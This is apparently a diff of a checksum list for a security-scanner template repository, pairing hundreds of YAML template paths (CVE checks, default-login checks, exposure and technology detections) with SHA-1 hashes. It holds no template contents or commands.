http/cves/2022/CVE-2022-2034.yaml:6d1a2c994d2ebda1cdcdc84b36237565c66c592a
http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944
http/cves/2022/CVE-2022-21500.yaml:7a87435ea2a54ac9c454a344a87fd21e51758b36
http/cves/2022/CVE-2022-21587.yaml:9e40fc00a04665d81ac142e197d40f1926a521c6
@ -2480,7 +2483,7 @@ http/cves/2022/CVE-2022-25489.yaml:5c5c7a7388f9e133b0cf380bad27eeaebb0c2a74
http/cves/2022/CVE-2022-25497.yaml:07424dc06af0ea2d10c5aa1a201ce4d0f2d26848
http/cves/2022/CVE-2022-2551.yaml:a2dc5d4686710a2e9aeea1bdadf8f7fac2f3766f
http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665
http/cves/2022/CVE-2022-2599.yaml:3acebe0eef8eedb44906ac2579e6d0f0024a48d3
http/cves/2022/CVE-2022-2599.yaml:f576fefcf8da91a4c868c4b06cad0a2ed36884cb
http/cves/2022/CVE-2022-26134.yaml:788a7f51e1550cc5770aab979234ac35b54d2505
http/cves/2022/CVE-2022-26138.yaml:15d0534ab6765d2e536070eda15d020e04f43abc
http/cves/2022/CVE-2022-26148.yaml:f37f9182974b9dd8d49af32a7ef9841fe7d704ae
@ -2819,7 +2822,7 @@ http/cves/2023/CVE-2023-24278.yaml:e397c7d647c7517b78e44dbc79c8fcbc80480623
http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896
http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477
http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8
http/cves/2023/CVE-2023-24489.yaml:c8aa249866735b4ad90a721d721d9e9426628ad8
http/cves/2023/CVE-2023-24489.yaml:c895cc71b777b3ada793ebcddd00274157f7927d
http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe
http/cves/2023/CVE-2023-24733.yaml:f1b740ac9ba1fc859deb3c69798e1bc3d302ed4e
http/cves/2023/CVE-2023-24735.yaml:e38322978b1598d32056adb11572c6c401107c40
@ -3055,7 +3058,7 @@ http/cves/2023/CVE-2023-5244.yaml:32f7df605dda4c16610c548f773673f5b69c67a5
http/cves/2023/CVE-2023-5360.yaml:387bf52196ed2e1d383a97ea158fe90b94d213b9
http/cves/2023/CVE-2023-5375.yaml:394c4b2b0867a8922fcfad500616380c117983d8
http/cves/2023/CVE-2023-5556.yaml:7d50d6e2861161f90b7876147d3405d5c7eeccf4
http/cves/2023/CVE-2023-5830.yaml:85965a9925a1cd03639181416b2c20995b33f501
http/cves/2023/CVE-2023-5830.yaml:76c2cd53d3eb9187c00e98e057fa4cdd29412e6a
http/cves/2023/CVE-2023-5914.yaml:93f627b753ac975d5a74a2532a42aa9449682207
http/cves/2023/CVE-2023-6018.yaml:e840e467eab7d472ae719996be481de06fafb2cf
http/cves/2023/CVE-2023-6020.yaml:68c05fb386a060d81834e2ddbaefb5779ae81b51
@ -3085,6 +3088,7 @@ http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e
http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15
http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1
http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949
http/cves/2024/CVE-2024-1212.yaml:5671b80e9ab3c9274bd98bbeb8fe508980393f85
http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983
http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b
http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7
@ -3101,6 +3105,7 @@ http/cves/2024/CVE-2024-25735.yaml:bb8f329838a1758c223d85cdbe23c820f8b61640
http/cves/2024/CVE-2024-27198.yaml:c4f066c0332dea8b23c9aa0990baa6b6b5c806bb
http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d
http/cves/2024/CVE-2024-27497.yaml:5ee80d14253ccdeec8c2bdc1c7e82a8062b4f487
http/cves/2024/CVE-2024-27954.yaml:d1056017d0cbf62dc6a2b0b6372ca2980992155c
http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c
http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7
@ -3108,7 +3113,7 @@ http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa
http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e
http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b
http/default-logins/aem/aem-felix-console.yaml:43658ba960762d06a5c8be673078e3049cb7e71f
http/default-logins/alibaba/canal-default-login.yaml:2c0e5475e64363fb8ec6f6748768c09a9da193de
http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc8b2789b6f72fd
http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9
http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe
http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b
@ -3206,7 +3211,7 @@ http/default-logins/ofbiz/ofbiz-default-login.yaml:2e6eea7863853fca0a5546a479d43
http/default-logins/openemr/openemr-default-login.yaml:e47d165fc7a306238827e4ea1497307f932890cd
http/default-logins/openmediavault/openmediavault-default-login.yaml:efb418987e7a7b80b6fc9ea78f883b4dcaa90efe
http/default-logins/oracle/businessintelligence-default-login.yaml:29309871b052bb3f05de613e838dadb92dd47f79
http/default-logins/oracle/peoplesoft-default-login.yaml:6ee288c848a0c5a046e206b7f245a50f886e72d6
http/default-logins/oracle/peoplesoft-default-login.yaml:21071ffc4b0449f88570d4d604038756ccd18209
http/default-logins/others/aruba-instant-default-login.yaml:398f77a4e4e01153465c51bdfeb3cf53f670a85b
http/default-logins/others/ciphertrust-default-login.yaml:9d29315f7fd68f1e4f55dd046bf7c716658ef13e
http/default-logins/others/cnzxsoft-default-login.yaml:71898b0928c2f380612addb0350fb686dd84e025
@ -3292,7 +3297,7 @@ http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870
http/exposed-panels/addonfinance-portal.yaml:38506f2dd6a3a69108a50fe67a2686af99398590
http/exposed-panels/adhoc-transfer-panel.yaml:dcce7565c43f4ea78e2a3ad9fc8216f301f05c94
http/exposed-panels/adiscon-loganalyzer.yaml:fc2432f93a3fd7724c3f0d2814d41c065e0b8b21
http/exposed-panels/adminer-panel-detect.yaml:e1426681f4d6c9e2502bc10a2327e73b6fa9113e
http/exposed-panels/adminer-panel-detect.yaml:2c1c41366071aef22dcd3f0fb77608e8ba4d18d8
http/exposed-panels/adminer-panel.yaml:b266fbab664e4ee130429e725409cf78000739e0
http/exposed-panels/adminset-panel.yaml:2be3fbb1ec0fe028405fdb0353163d1352a14d65
http/exposed-panels/adobe/adobe-component-login.yaml:ca846d96566ad14a055b85c15bd2b61e3a786d8d
@ -4111,6 +4116,7 @@ http/exposed-panels/skycaiji-admin-panel.yaml:361c2ff751869e4b694246e113ceaf3e0c
http/exposed-panels/slocum-login.yaml:882558fc76eedef7ba2f13a9011a298046d85fe5
http/exposed-panels/smartping-dashboard.yaml:95eec001a41f2fe0c66ebfc58e0560cd9755e5cd
http/exposed-panels/snapcomms-panel.yaml:2415e99a631ec5250f3f9be63e99f91d15d6f494
http/exposed-panels/softether-vpn-panel.yaml:9c37a5f904da87f0cc892b4a675a6b50432e2708
http/exposed-panels/solarview-compact-panel.yaml:be95efca10dca1f6b755b1d7e6f91e4f77e0594f
http/exposed-panels/solarwinds-arm-panel.yaml:2aaf482c52b633dfe17bad946cfed56da0282d0f
http/exposed-panels/solarwinds-orion.yaml:d04c286187f0f4b310d767196124eead9bab0a89
@ -4340,7 +4346,7 @@ http/exposures/apis/wadl-api.yaml:7a728eb7a4cb779218d582661a7fb2978abedc03
http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df
http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907
http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984
http/exposures/backups/php-backup-files.yaml:6af27377a944a299aee9bf4c4dbd8b60b99b8224
http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391
http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b
http/exposures/backups/sql-dump.yaml:e989e8b4ad56b0ed996c7dc9cec7eab2210c223c
http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e
@ -4524,7 +4530,6 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38
http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9
http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272
http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4
http/exposures/files/drupal-install.yaml:becf211637e4dbbe6b1f0fa018d53f4ea23de648
http/exposures/files/ds-store-file.yaml:679fb351af4567e417c0697f8d3298ddc14767b4
http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b
http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4
@ -4533,6 +4538,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5
http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d
http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910
http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1
http/exposures/files/generic-db.yaml:36dc57f7db3eac512d56d7d54f0bb767cbb7fe88
http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d
http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf
http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e
@ -4822,19 +4828,19 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d
http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9
http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735
http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb
http/fuzzing/cache-poisoning-fuzz.yaml:0dea0da9f14667463434dd2938455cb041e9de7a
http/fuzzing/header-command-injection.yaml:f35e69a5b540b432355364ce314be23d0dfe72de
http/fuzzing/iis-shortname.yaml:878ffbd680260e7de82515ae139572b9d076ba40
http/fuzzing/linux-lfi-fuzzing.yaml:6d09bdb021b1d2f04197a1afcb5566f94c345578
http/fuzzing/mdb-database-file.yaml:44368401b80d528a53411419188d8654cc01092a
http/fuzzing/prestashop-module-fuzz.yaml:1770351eb8024ad210d1773b851f15a92f523bf6
http/fuzzing/ssrf-via-proxy.yaml:67a0e37236d363d42d148494ee00f3fb55372ce3
http/fuzzing/valid-gmail-check.yaml:5322234e7caccea4fe57c3ec8ea7e5b6b91317e6
http/fuzzing/waf-fuzz.yaml:6b9237448f006d60291634510ac4d910fb73ca0c
http/fuzzing/wordpress-plugins-detect.yaml:3bb133a2a5af6333133a4d1afc69b7253325e071
http/fuzzing/wordpress-themes-detect.yaml:81452a0c2201364547a722b3268c3cc9be19fbad
http/fuzzing/wordpress-weak-credentials.yaml:3688f4121a6862a3ec2177a0c28c6f0aaea1cfe8
http/fuzzing/xff-403-bypass.yaml:3988407398c98a0f521e0251aafe2738470ed895
http/fuzzing/cache-poisoning-fuzz.yaml:f98fed523a1e8b80a6c5c12183c6f072bb81cf5e
http/fuzzing/header-command-injection.yaml:bf0af66d12ef68c553a7a0d496f469788f3d03c3
http/fuzzing/iis-shortname.yaml:aafbc44fc50e604004bf52f14b83354e24163827
http/fuzzing/linux-lfi-fuzzing.yaml:a92bbc9f1c966c3f909279c49e2dee0a2bfffac9
http/fuzzing/mdb-database-file.yaml:f6bb4e9e482516e6a861cc1efc68063e61778d13
http/fuzzing/prestashop-module-fuzz.yaml:8e7f0e0bd609549e38f8eadc603360e8a56f2a02
http/fuzzing/ssrf-via-proxy.yaml:8b57f45fe9d33268b5ae1dcd1a73301a47dfee62
http/fuzzing/valid-gmail-check.yaml:a91c4df030cbeb5d163df9a3150cb146eb495412
http/fuzzing/waf-fuzz.yaml:0bf3b44516d1eab46bbc11fb2eada0293c76a2ad
http/fuzzing/wordpress-plugins-detect.yaml:4bd980e6a9b9246896b0961dbff25a199038bcf0
http/fuzzing/wordpress-themes-detect.yaml:86b90c67fd9c7fb48a6eff67fdb63a185f402ea8
http/fuzzing/wordpress-weak-credentials.yaml:13dbc34b62167f75f802b83a3e71d89387ba54a6
http/fuzzing/xff-403-bypass.yaml:23f78013ddcc53b07fbc3a114f0eaa45f90001d5
http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbbc5
http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25
http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa
@ -4895,7 +4901,7 @@ http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d
http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0
http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387
http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5
http/miscellaneous/defacement-detect.yaml:b1ec2272ff1ecfdfa21cf8bec5620e26d325817e
http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e
http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b
http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326
http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281
@ -4912,7 +4918,7 @@ http/miscellaneous/maxforwards-headers-detect.yaml:9d69555c1fc58f644b5ccf2644e0a
http/miscellaneous/microsoft-azure-error.yaml:bfa3c53d4023d524a09ba3565bd3bf63204ac58a
http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43
http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0
http/miscellaneous/ntlm-directories.yaml:5f40ea6a1dda6cd8654e61902adb60b877945de5
http/miscellaneous/ntlm-directories.yaml:8d52b0df9375267f6ba7840037a48a96cb971dda
http/miscellaneous/old-copyright.yaml:de816764aefeaf59f75201740f4f82fb31071194
http/miscellaneous/options-method.yaml:2e0edc5993baa53c6fb7e8307c80ea26254bc3e4
http/miscellaneous/rdap-whois.yaml:c25cfe8b61f82c032de77398cf1aed94f56f0004
@ -4958,7 +4964,7 @@ http/misconfiguration/aem/aem-secrets.yaml:346f23f7070fdf59c2c76fddd12a5eb4f31c7
http/misconfiguration/aem/aem-security-users.yaml:ff974be49aaee03897db4a6d40117b9e5d02598d
http/misconfiguration/aem/aem-setpreferences-xss.yaml:dd08fc188a7ad278c8ee3082b66d9d2282d1c9e8
http/misconfiguration/aem/aem-sling-userinfo.yaml:f38274749b0668275a6b8cdddc2707bbde9eb1a0
http/misconfiguration/aem/aem-userinfo-servlet.yaml:ad12a83b873c3e1bd09b0b675368f78013a26261
http/misconfiguration/aem/aem-userinfo-servlet.yaml:4e42c3fd5d4ae21b1e0a686a35c69394d1d9d32b
http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:cc07ee10590df2dd7de1d03c73167bbd4d81b95b
http/misconfiguration/aem/aem-xss-childlist-selector.yaml:a9ecdb229a17db9192821a583549813a1bb1fc3c
http/misconfiguration/airflow/airflow-debug.yaml:c18746cecd6f440d9367f6ebe1ce70ff34e508af
@ -5073,7 +5079,7 @@ http/misconfiguration/gitlab/gitlab-public-repos.yaml:1a2b426983d0ca449461a9ece3
http/misconfiguration/gitlab/gitlab-public-signup.yaml:f604c8044baffdf63ed2215ccec5b5721202144b
http/misconfiguration/gitlab/gitlab-public-snippets.yaml:64aa47f34d185b8bbbc04b242eb0a76886d641ec
http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:d9959b940359896de41142fe765303a3627c7ae5
http/misconfiguration/gitlab/gitlab-user-enum.yaml:f3372fa8a631a0249e5a108ac8e2d610a5a6ec71
http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a501e1c580757
http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e
http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d
http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc
@ -5129,6 +5135,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3
http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7
http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f
http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057
http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36
http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9
http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251
http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99
@ -5320,9 +5327,9 @@ http/misconfiguration/proxy/metadata-hetzner.yaml:99b85a4199e83eff23ec416b6b6fff
http/misconfiguration/proxy/metadata-openstack.yaml:6e1984d2e3aa87e07e6b7db80dbd7c9d10c9d417
http/misconfiguration/proxy/metadata-oracle.yaml:93d94888c382735e755c96a1908859778f1308ef
http/misconfiguration/proxy/open-proxy-external.yaml:e05b7e6f0744ee250192e9167a89b4d6c7dfdee1
http/misconfiguration/proxy/open-proxy-internal.yaml:198c9a37e2ddb668d66fb1598d5f73784dca1a24
http/misconfiguration/proxy/open-proxy-localhost.yaml:2a876eb905cbd8591af8d8c7cb8494fd2db314e9
http/misconfiguration/proxy/open-proxy-portscan.yaml:10aaa6234f8c68a346e226e5bc615de2134ac10e
http/misconfiguration/proxy/open-proxy-internal.yaml:231fecdb37f031eb304aba2267a8ba6ad16641ec
http/misconfiguration/proxy/open-proxy-localhost.yaml:583e013ed1b8deaaa42735861dc5201a8285afc6
http/misconfiguration/proxy/open-proxy-portscan.yaml:790b7ea770648cb312cb5c103951c3c7254cb0c2
http/misconfiguration/puppetdb-dashboard.yaml:5b1f354f5ab9343e46a20bd7c76a8ee044cf71b4
http/misconfiguration/put-method-enabled.yaml:4cbb1715aeb73cf6e638b02c9951ff02c7a67756
http/misconfiguration/python-metrics.yaml:0b1d1102e4329ebf75ae5cc259898f1cb1cd9670
@ -6407,6 +6414,7 @@ http/technologies/dell/dell-idrac8-detect.yaml:1dff3a1be021d38ea8846d6151c920edb
http/technologies/dell/dell-idrac9-detect.yaml:44da5eecdb4a220ccde1aecdd8c801986a988367
http/technologies/detect-sentry.yaml:f4f51185253e23a6e3db1f4bbcb1a37bebf4da1a
http/technologies/devexpress-detect.yaml:6a5327a8a84357f2e365da16936697859e0f6020
http/technologies/directus-detect.yaml:6284abebab6cc1c447f02dd03c711303a4cdd22f
http/technologies/dreambox-detect.yaml:35362632d9ed50a1e5b4513bfc5a09543c63e431
http/technologies/drupal-detect.yaml:5c269fdf58cf085a8ac062b1f23cd8b3a0ef7f99
http/technologies/dwr-index-detect.yaml:11ebf6bffb83d15af8cbca407b38fee3d67b72ab
@ -6426,7 +6434,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1
http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac
http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a
http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5
http/technologies/fingerprinthub-web-fingerprints.yaml:27e666a6c70080629b106d8a7549a69b04e80292
http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd
http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2
http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9
http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9
@ -6447,7 +6455,7 @@ http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80c
http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29
http/technologies/graphql-detect.yaml:a0566e15058b3aeb2d4dae77cc99d23355938dac
http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1
http/technologies/graylog/graylog-api-exposure.yaml:5a677a5db5ed943770e6f6a1c2cf4e6e8f947b36
http/technologies/graylog/graylog-api-exposure.yaml:d101cae7fd923dd7f233bf27e3a9b3628b8c3d5e
http/technologies/graylog-api-browser.yaml:5aaa8bff99b57cf700d0923b48778048789f2389
http/technologies/gunicorn-detect.yaml:4e32fda7d9483af8c21fd3ea7fa6669266e23d0d
http/technologies/hanwang-detect.yaml:4866144f96b1fbc18567e10ad7732b8a1a8dfc5f
@ -6532,7 +6540,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0
http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d
http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06
http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81
http/technologies/microsoft/microsoft-iis-version.yaml:879e7e413c5a14c9f8d60c781d1a2d6e14082a0c
http/technologies/microsoft/microsoft-iis-version.yaml:dcf1fea08a8e195fb4fb800bddc0355619141c06
http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7
http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69
http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8
@ -6677,6 +6685,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120
http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f
http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d
http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542
http/technologies/wing-ftp-service-detect.yaml:0df5cbc14e688f4a21fb88751550ed2dc27e5497
http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d
http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8
http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900
@ -7609,6 +7618,7 @@ http/vulnerabilities/other/unauth-hoteldruid-panel.yaml:279bc487a6928ac8687f5e2e
http/vulnerabilities/other/unauth-spark-api.yaml:d3205ad468e29b3fd6d59637db539399b1c93c64
http/vulnerabilities/other/unifi-network-log4j-rce.yaml:ab0f3c5c653a7406ee48d9a1ee0b1b810801c6db
http/vulnerabilities/other/universal-media-xss.yaml:18afec046906e2afc3c2a1b9eee94e6fed1008e9
http/vulnerabilities/other/ups-network-lfi.yaml:973370147cfb7fb529fd2c978f4900ccef9215af
http/vulnerabilities/other/vanguard-post-xss.yaml:ebea3529277da89f92f263b4c2e01b1440ead349
http/vulnerabilities/other/viewlinc-crlf-injection.yaml:dc9df9a7e0f610a07fe7611c166ae358706450ce
http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:e69e54fb6312bebd4dd9e111db93045fea6eedef
@ -7702,7 +7712,7 @@ http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d
http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:26127f055c9c3ffa79366002ca95ea0c80a9c1dc
http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c
http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc
http/vulnerabilities/tongda/tongda-auth-bypass.yaml:4fd1922eebdd4690602da2a46f2db2aafdfcef26
http/vulnerabilities/tongda/tongda-auth-bypass.yaml:99626945f8fb206ae2046e9f22cebadaef9eef0e
http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:d1d9be064a074860683581a4e84f8e85a3abfc27
http/vulnerabilities/tongda/tongda-getdata-rce.yaml:b4452e0abc9faa89378a2d6b14c6ef99eddbb56d
http/vulnerabilities/tongda/tongda-getway-rfi.yaml:02cae92f443ca026546155a79f51aab073d2a0dd
@ -7944,7 +7954,7 @@ http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4
http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304
http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878
http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:0e1c6d447132c374e620d553de2cd8a8468f917e
http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:f19c8ecb61fc6cb7a1d1c1f94898be756d976779
http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:a9c485aef2957f73eec1ea22a2b851f98284f9c9
http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:f72f913987c22ad251d6b4b09e10fe57f20f0727
http/vulnerabilities/wordpress/wp-xmlrpc.yaml:b55a9ba158dc74c9797ce3cddb6464bf48106074
http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml:ec8dd93cf0c3f663465b7191136013def01f5d0f
@ -7985,13 +7995,13 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac
http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0
http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b
javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0
javascript/cves/2023/CVE-2023-34039.yaml:99873aefa26ca441bdea56e83f1433ddc11054c4
javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8
javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb
javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625
javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3
javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161
javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad
javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f
javascript/default-logins/ssh-default-logins.yaml:18115e88843b935c771139ba788aa321a8a8e75b
javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62
javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94
javascript/detection/oracle-tns-listener.yaml:3d274f668de183b62c79c04782bf0740150b4423
javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04
@ -8136,10 +8146,10 @@ network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c
network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b
network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109
network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a
network/misconfig/mysql-native-password.yaml:214396d10e5a824362e0184c365b862581629394
network/misconfig/mysql-native-password.yaml:610a602de84dc589c5f48b133d27f6b77f3cc422
